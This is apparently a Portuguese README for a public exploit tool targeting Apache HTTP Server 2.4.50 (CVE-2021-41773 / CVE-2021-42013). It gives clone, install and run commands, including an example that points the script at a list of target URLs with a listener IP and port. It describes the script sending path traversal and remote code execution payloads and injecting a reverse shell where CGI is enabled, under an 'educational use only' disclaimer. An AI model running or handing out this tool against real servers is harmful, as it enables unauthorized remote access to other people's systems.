
Apache-HTTP-Server-2.4.50-RCE Esta ferramenta foi projetada para testar servidores Apache quanto à vulnerabilidade CVE-2021-41773 / CVE-2021-42013. Ela é destinada apenas para fins educacionais e deve ser usada de forma responsável em sistemas para os quais você tenha permissão explícita para testar.
Esta ferramenta foi projetada para testar servidores Apache quanto à vulnerabilidade CVE-2021-41773 / CVE-2021-42013. É destinada apenas para fins educacionais e deve ser usada de forma responsável em sistemas para os quais você tenha permissão explícita para testar.
git clone https://github.com/Zyx2440/Apache-HTTP-Server-2.4.50-RCE.git
cd Apache-HTTP-Server-2.4.50-RCE
pip3 install requests~=2.27.1 termcolor~=1.1.0
pip3 install -r add_requirements.txt
python3 50512.py target.txt -ip <SeuIp> -port <APorta>
o arquivo de texto deve conter a url do alvo
python3 50512.py target.txt -ip 10.0.2.15 -port 4444



Verificação da versão do Apache: Para cada URL no arquivo fornecido, ele verifica se o servidor está executando a versão 2.4.50 do Apache.
Se o servidor estiver vulnerável: Ele tenta explorar o servidor enviando payloads para desencadear ataques de directory traversal ou executar código remotamente. Se CGI estiver habilitado: Ele tenta injetar um payload de reverse shell para obter acesso remoto.
Apenas para uso educacional: O script é destinado a fins educacionais para demonstrar como vulnerabilidades podem ser testadas e exploradas. Usar este script contra alvos não autorizados é ilegal e antiético.
Propósito da modificação: Adicionado tratamento de erros adicional e otimizada a lógica de payload e RCE e removido cve